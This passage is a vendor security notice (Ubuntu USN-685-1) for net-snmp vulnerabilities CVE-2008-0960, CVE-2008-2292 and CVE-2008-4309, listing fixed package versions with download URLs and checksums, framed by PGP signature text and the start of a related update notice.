WzNm3rFtT5H\nRKMWpO+M9bHp4d+puY0L1YwN1OMatcMMpcWnZpiWiR83oi32+xtWUY2U7Ae38mMa\ng8zFbpeqPQUsDv9V7CAJ1dbriEwEGBECAAwFAkDYBnoFCQ5t3+gACgkQqE7a6JyA\nCspnpgCfRbYwxT3iq+9l/PgNTUNTZOlof2oAn25y0eGi0371jap9kOV6uq71sUuO\n=ypVs\n- -----END PGP PUBLIC KEY BLOCK-----\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.5 (GNU/Linux)\n\niQEVAwUBSJL0gHey5gA9JdPZAQI4IAf7BPqInfbAyzZObcX2vGZM0svDKclNQMAO\n1tTE0O3Te0EYLOnkfEisqNe9AOioSUQqeWu7ud5Y8L5zVysmcGe3/Lg0Vqmie/he\nWJXCJtkvaPOcp7p/GcnWQByQ4T1cQ4+QoLhwg2+RpyAABn/7ZWBz+uG91134kOql\nJabvxLI05Le++uwFfJ0YEefkSzik9sMVz4Dk4eVJglMm6nioHnx6K6ZrR0+0HBRR\nz2Rczq0M3gYplfWpgydgtlFH4dhkXlhfuladf93Aagf6QWerwvxTEld7ti+Sx3dU\nuInx4nkLJHLeu1f/XD4i7ZpZ0DtBz0F9wWJFGmy2cXxW0Xnhtwdbnw==\n=QwLq\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. ===========================================================\nUbuntu Security Notice USN-685-1          December 03, 2008\nnet-snmp vulnerabilities\nCVE-2008-0960, CVE-2008-2292, CVE-2008-4309\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 7.10\nUbuntu 8.04 LTS\nUbuntu 8.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  libsnmp-perl                    5.2.1.2-4ubuntu2.3\n  libsnmp9                        5.2.1.2-4ubuntu2.3\n\nUbuntu 7.10:\n  libsnmp-perl                    5.3.1-6ubuntu2.2\n  libsnmp10                       5.3.1-6ubuntu2.2\n\nUbuntu 8.04 LTS:\n  libsnmp-perl                    5.4.1~dfsg-4ubuntu4.2\n  libsnmp15                       5.4.1~dfsg-4ubuntu4.2\n\nUbuntu 8.10:\n  libsnmp15                       5.4.1~dfsg-7.1ubuntu6.1\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes. \n\nDetails follow:\n\nWes Hardaker discovered that the SNMP service did not correctly validate\nHMAC authentication requests.  An unauthenticated remote attacker\ncould send specially crafted SNMPv3 traffic with a valid username\nand gain access to the user\u0027s views without a valid authentication\npassphrase. (CVE-2008-0960)\n\nJohn Kortink discovered that the Net-SNMP Perl module did not correctly\ncheck the size of returned values.  If a user or automated system were\ntricked into querying a malicious SNMP server, the application using\nthe Perl module could be made to crash, leading to a denial of service. \nThis did not affect Ubuntu 8.10. (CVE-2008-2292)\n\nIt was discovered that the SNMP service did not correctly handle large\nGETBULK requests. (CVE-2008-4309)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.2.1.2-4ubuntu2.3.diff.gz\n      Size/MD5:    75402 9655d984a47cec8e27efa4db0b227870\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.2.1.2-4ubuntu2.3.dsc\n      Size/MD5:      838 17a17230a005c1acfd0569757e728fad\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.2.1.2.orig.tar.gz\n      Size/MD5:  3869893 34159770a7fe418d99fdd416a75358b1\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.2.1.2-4ubuntu2.3_all.deb\n      Size/MD5:  1152306 f7647cee4df8db87ab48c0d05635a973\n    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.2.1.2-4ubuntu2.3_all.deb\n      Size/MD5:   822946 b9b852c188937d1fffc06d4da01325d5\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_amd64.deb\n      Size/MD5:   896620 a78012b3f0f13667081f97dc1a4d62e8\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_amd64.deb\n      Size/MD5:  1497194 7d55b8d1e4ae0c45753bedcf536a1a5a\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_amd64.deb\n      Size/MD5:  1826252 0550c1401f9bbe5f345fd96484ed369c\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_amd64.deb\n      Size/MD5:   889330 5ad0ddb2c610973166e4dd07769ba3d3\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_amd64.deb\n      Size/MD5:   797086 18cf4210342b683d3ee24fe995329b55\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_i386.deb\n      Size/MD5:   896880 298d27ea1ece6e80bb8931b9a5e61961\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_i386.deb\n      Size/MD5:  1268472 acbca43ab7ea747fa3e4636d15ef997c\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_i386.deb\n      Size/MD5:  1710342 bd27290685bcf1d6a23eb8705d3367e7\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_i386.deb\n      Size/MD5:   881838 58121bd9e4c845da7df4e540645e0e13\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_i386.deb\n      Size/MD5:   794672 221d1c554bd89f50dc3ac9108a6cef6b\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_powerpc.deb\n      Size/MD5:   913064 45a033b01c4b31ef90a92988bb5fb229\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_powerpc.deb\n      Size/MD5:  1590124 b62aa5477d9307d311c811298b7ec3d9\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_powerpc.deb\n      Size/MD5:  1728094 5214ce9aebe3a8d7a28a1746a81ce8ea\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_powerpc.deb\n      Size/MD5:   898580 86e6c1b5dfb5bf91f63d7c6786b7abae\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_powerpc.deb\n      Size/MD5:   796092 1bab28407224f782b2c3ae04b4647333\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_sparc.deb\n      Size/MD5:   896832 3d233db9682d5654fdad6bc6b5a649ba\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_sparc.deb\n      Size/MD5:  1485268 064304ead0ca4653136376e8e9039e74\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_sparc.deb\n      Size/MD5:  1706490 cb76027eb8167e0866a81b93a4da28ed\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_sparc.deb\n      Size/MD5:   883182 d1ffc12427d92be51efdba3349e74f9a\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_sparc.deb\n      Size/MD5:   796374 0f3f749ebe4af6111fe49316639004e4\n\nUpdated packages for Ubuntu 7.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.3.1-6ubuntu2.2.diff.gz\n      Size/MD5:    94646 8b6f9380d9f8c5514a1d4db729c6df04\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.3.1-6ubuntu2.2.dsc\n      Size/MD5:     1287 f53866efd3ae4f3c939a77b1005e1f11\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.3.1.orig.tar.gz\n      Size/MD5:  4210843 360a9783dbc853bab6bda90d961daee5\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.3.1-6ubuntu2.2_all.deb\n      Size/MD5:   484306 f2d03276d1cdcef7e8b276ad8ca9595d\n    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.3.1-6ubuntu2.2_all.deb\n      Size/MD5:   901284 6889b371d4de92eb61bf83b89d8a8c37\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_amd64.deb\n      Size/MD5:  2541692 1e6de4bd3c3baa444a2e1980a593a40e\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_amd64.deb\n      Size/MD5:   968940 7efe4bdcb99f311f1c4bb2c3b9d24a4e\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_amd64.deb\n      Size/MD5:  1200930 821861c24499cfdfa2a82c329c610c16\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_amd64.deb\n      Size/MD5:   996572 00cc1a4c8c7924124984e666563e73d0\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_amd64.deb\n      Size/MD5:   908792 a40763280a3bdbe60eca5e07c5d6c30c\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_i386.deb\n      Size/MD5:  2321524 59d44616802197e1227cf88abddefe36\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_i386.deb\n      Size/MD5:   967106 a6e5b308d889bdf6f5abe454e35ba474\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_i386.deb\n      Size/MD5:  1124462 ec99daa26d0fafba6e9f0b874a23bf3d\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_i386.deb\n      Size/MD5:   991956 cb20b6a4d68a858ffa0846431169d411\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_i386.deb\n      Size/MD5:   907546 1ab5119e23a16e99203c113d49fc2723\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_lpia.deb\n      Size/MD5:  2305548 da57690a3327196e0c3684735be23f2e\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_lpia.deb\n      Size/MD5:   968984 8da336a5fd871be10e6b8d66d3b9c9d3\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_lpia.deb\n      Size/MD5:  1074500 e4d6690a6a6a543fc0244a29cd350c9b\n    http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_lpia.deb\n      Size/MD5:   989566 2d2f4b1662e6a2dffafe8e98f00a15e7\n    http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_lpia.deb\n      Size/MD5:   907596 4274e006754ebc836132166e0f0429a0\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_powerpc.deb\n      Size/MD5:  2641202 9b2ec56463ee715752b780aa332d8cd0\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_powerpc.deb\n      Size/MD5:   985722 a2fca8426b7b51e98c39b91a468bf71f\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_powerpc.deb\n      Size/MD5:  1154496 6073239f7ffead2a5b9c3357ada1602c\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_powerpc.deb\n      Size/MD5:  1018596 af12cc55597a0d2d3a92b4b5d683bb14\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_powerpc.deb\n      Size/MD5:   911866 57e2246930e712bdc1b039840d43af48\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_sparc.deb\n      Size/MD5:  2527568 19b1a0971259a9b99f9c0386f5935bfc\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_sparc.deb\n      Size/MD5:   970264 d8ae7f0bb10375ad487b14ba031cd013\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_sparc.deb\n      Size/MD5:  1078842 2401fc4c40352b8c8013e8c5de3b0ecd\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_sparc.deb\n      Size/MD5:   995228 16b230d3c718d8eb4a023126bd09d7f5\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_sparc.deb\n      Size/MD5:   908708 1e410a8ddac41ad9faec901c5a638f29\n\nUpdated packages for Ubuntu 8.04 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-4ubuntu4.2.diff.gz\n      Size/MD5:    78642 b4acf50e47be498e579b934f32081d25\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-4ubuntu4.2.dsc\n      Size/MD5:     1447 0abcea5df87851df2aae7ebd1fc00e7a\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg.orig.tar.gz\n      Size/MD5:  4618308 0ef987c41d3414f2048c94d187a2baeb\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.4.1~dfsg-4ubuntu4.2_all.deb\n      Size/MD5:   526864 f3a131bf5a4f5c547573430cb66d410c\n    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.4.1~dfsg-4ubuntu4.2_all.deb\n      Size/MD5:   102072 2f276f50efdb7e34f7e61f132f7f7cd7\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_amd64.deb\n      Size/MD5:  1796950 283c5a95206ab74062e0e30eba4e0890\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_amd64.deb\n      Size/MD5:   142522 9fff294368a7eac39e37fa478ac6609d\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_amd64.deb\n      Size/MD5:  1296694 d0646a1543c51f14a93b40f972bc1569\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_amd64.deb\n      Size/MD5:   163178 0378a25e3b2a0bc80ddb8ec720b5557d\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_amd64.deb\n      Size/MD5:    75960 fcba461f2e2376cad515329791e04a17\n    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_amd64.deb\n      Size/MD5:    38512 21d9ecbc86a8e5965047d027e94fd324\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_i386.deb\n      Size/MD5:  1556806 39e4f63b841c4b36c022017d66c12f58\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_i386.deb\n      Size/MD5:   179478 5f08596ae997792920e238ff8cd2a7ba\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_i386.deb\n      Size/MD5:  1098794 38bc61a5b403fb4f626a641a5f13e681\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_i386.deb\n      Size/MD5:   157954 66e38c37639f3c68e7e4a933fa953ff3\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_i386.deb\n      Size/MD5:    74116 50b3a4d0cfd38585d2711d30cf725e9d\n    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_i386.deb\n      Size/MD5:    75038 98cdeec4b1014568b00107a82fc74418\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_lpia.deb\n      Size/MD5:  1552018 d9dcab084f3b9bf3e8c36cb5db8f141e\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_lpia.deb\n      Size/MD5:   141508 96061180809cccc975e0d7079e07ed3e\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_lpia.deb\n      Size/MD5:  1171530 2d91048fe0a2ac9e3a4fddb84c67513e\n    http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_lpia.deb\n      Size/MD5:   155564 c67ba3aeb2535ee3e7fc4c89e90ba36a\n    http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_lpia.deb\n      Size/MD5:    74274 db05202893f516398bbe4e2153ef2d6e\n    http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_lpia.deb\n      Size/MD5:    35552 a75caf212ffb5a0eafe4ba2656c9aae1\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_powerpc.deb\n      Size/MD5:  1874428 0ed8b5f4e6bad74d506d73447de00bd2\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_powerpc.deb\n      Size/MD5:   158374 dfcd7c4455b4bbd3f746368058d09a59\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_powerpc.deb\n      Size/MD5:  1238226 b5b3a81e956cdb14674d571694d1b6d0\n    http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_powerpc.deb\n      Size/MD5:   185314 5e9d8bd56493f75ae8a8691c530aa420\n    http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_powerpc.deb\n      Size/MD5:    83106 75dea32ec7152b7868fabf09d9d5a198\n    http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_powerpc.deb\n      Size/MD5:    42928 214fe703fced2e387b48b51dcbb1d6b7\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_sparc.deb\n      Size/MD5:  1760062 ade4c08289d947d092a5b2ab06517cc7\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_sparc.deb\n      Size/MD5:   143860 62b7260d618531b0ed5e7871ab7b99a9\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_sparc.deb\n      Size/MD5:  1159702 28ea81660bbdd9d7982be58d225e8814\n    http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_sparc.deb\n      Size/MD5:   160236 196e493ce73905446a3764e73b99f332\n    http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_sparc.deb\n      Size/MD5:    75518 f24e4b0e3e4a7d97c28da99cdc0a47a5\n    http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_sparc.deb\n      Size/MD5:    38240 873f5e820e381ec2254ed520bcd09af0\n\nUpdated packages for Ubuntu 8.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-7.1ubuntu6.1.diff.gz\n      Size/MD5:    82260 85fb58aa81933f142bd937bca2e18341\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-7.1ubuntu6.1.dsc\n      Size/MD5:     1956 1ee06f6b731eae435af6a2d438ef909b\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg.orig.tar.gz\n      Size/MD5:  4618308 0ef987c41d3414f2048c94d187a2baeb\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.4.1~dfsg-7.1ubuntu6.1_all.deb\n      Size/MD5:   527650 9c56f3d70018b714895a61c0daba9498\n    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.4.1~dfsg-7.1ubuntu6.1_all.deb\n      Size/MD5:   103060 108eb50387ca46b4ee38ebb8722ced88\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb\n      Size/MD5:  1815638 82385081fe2d4eeb1a6c94f9dae672ad\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb\n      Size/MD5:   146154 1b6249e02e89213f2f4d2aa9c9123420\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb\n      Size/MD5:  1315628 8443e091f2c63485a422236ad23e55cd\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb\n      Size/MD5:   165522 154a05824b98e041ceac60ac83709ef4\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb\n      Size/MD5:    77914 8d6e328f309e78bf1fcf21c2633d82ec\n    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb\n      Size/MD5:    39930 6b7a1a67ca63b5c843ce66f3547b3c89\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_i386.deb\n      Size/MD5:  1569568 dd0599b150eccee9889325d17a7b0769\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_i386.deb\n      Size/MD5:   184264 52a54aebef81648164a5bc90f27b0cc5\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_i386.deb\n      Size/MD5:  1119072 10c81fe283b25e7ad31fcfd88a2325f0\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_i386.deb\n      Size/MD5:   156112 6296f0836bc9797ff48810c79965c3a5\n    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_i386.deb\n      Size/MD5:    74476 bd96a6915eb97fed083aac4daa5f07cf\n    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_i386.deb\n      Size/MD5:    77652 3e30e51c362dfa982a3b3197be081328\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb\n      Size/MD5:  1557614 065f4575c7a2d257fa6b5b9d0cee454f\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb\n      Size/MD5:   144292 b55f2c4aff8a86499d7f38fd6e773f44\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb\n      Size/MD5:  1184272 84116fefdce279ce338ffc9614384c06\n    http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb\n      Size/MD5:   154444 ffe9e765a01695355bdb58008a2910f5\n    http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb\n      Size/MD5:    73746 762e75672fbd395d2d159513f5d572b0\n    http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb\n      Size/MD5:    36530 0a98b51b94a5f75d4131d657aa766579\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb\n      Size/MD5:  1884632 a3ad023841ee605efa1e055712b44d9a\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb\n      Size/MD5:   161074 5586adea8200d2d5bf81f288b5bf7be2\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb\n      Size/MD5:  1249636 48ec688499fea1dc0ccb3091c0158fb8\n    http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb\n      Size/MD5:   181952 8ef5f6b9b6c6b8e4fcd5cb37147304a2\n    http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb\n      Size/MD5:    81802 965218126fb5a49cfcd9e20afeb49782\n    http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb\n      Size/MD5:    43048 09f2f9ed9f519ca5723411802e46d48b\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb\n      Size/MD5:  1759316 46455cc355c1b808243eada0f134d00b\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb\n      Size/MD5:   145164 2cdb5b35db853c7c184a44022fc23cd8\n    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb\n      Size/MD5:  1159834 cfff424e5bff38bb3ef9419f03465388\n    http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb\n      Size/MD5:   163042 354f7a5423a34c411c5f8620c66d3e58\n    http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb\n      Size/MD5:    76994 ca11bcf9a411f618e35e1d6b6ab8c8f9\n    http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb\n      Size/MD5:    38526 172493ec5df1866e2633e074c7f38775\n\n. OpenSSL Binaries Updated\n\n   This fix updates the third party OpenSSL library. net-snmp Security update\n   \n   This fix upgrades the service console rpm for net-snmp to version\n   